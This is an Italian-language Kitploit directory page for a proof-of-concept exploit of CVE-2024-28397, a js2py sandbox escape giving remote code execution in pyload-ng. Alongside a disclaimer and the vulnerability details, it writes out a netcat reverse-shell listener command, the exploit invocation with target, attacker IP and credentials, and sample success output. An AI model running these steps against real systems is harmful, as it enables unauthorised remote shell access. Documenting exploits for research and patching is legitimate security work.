Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Remote-Code-Execution-CVE-2024-28397-pyload-ng-js2py- — Exploit PoC per CVE-2024-28397 – Esecuzione di codice remoto in pyload-ng tramite bypass della sandbox di js2py | Kitploit
Strumenti/GitHubGitHub/udayveer17/remote-code-execution-cve-2024-28397-pyload-ng-js2py-
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni Web
GitHubudayveer17/remote-code-execution-cve-2024-28397-pyload-ng-js2py-

Remote-Code-Execution-CVE-2024-28397-pyload-ng-js2py-

Exploit PoC per CVE-2024-28397 – Esecuzione di codice remoto in pyload-ng tramite bypass della sandbox di js2py

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
1 mese faNon ancora revisionato

Esecuzione di codice remoto – CVE-2024-28397 (pyload-ng / js2py)

Questo repository contiene un exploit Proof-of-Concept (PoC) per CVE-2024-28397, una vulnerabilità di esecuzione di codice remoto che affligge pyload-ng a causa dell'uso non sicuro di js2py.

Disclaimer:
Questo PoC è solo a scopo educativo e di ricerca.
Non usarlo su sistemi di cui non sei proprietario o per cui non hai esplicito permesso di test.
L'autore non è responsabile per qualsiasi uso improprio di questo codice.


Dettagli della vulnerabilità

  • ID CVE: CVE-2024-28397
  • Componente: js2py in pyload-ng
  • Impatto: Esecuzione di codice remota (RCE)
  • Vettore d'attacco: Un payload JS dannoso fuoriesce dalla sandbox di js2py ed esegue comandi di sistema arbitrari.

Requisiti e configurazione

Avrai bisogno di Python 3.x, della libreria requests e di netcat per ricevere la reverse shell.

  • Target → Istanza pyload-ng vulnerabile con endpoint /run_code accessibile

Listener → Avvialo prima di eseguire lo exploit:

nc -lvnp 4444

Utilizzo:

python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123

Esempio di output:

  • [+] Registrazione riuscita!
  • [+] Login riuscito
  • [+] exploit riuscito
Scarica lo strumento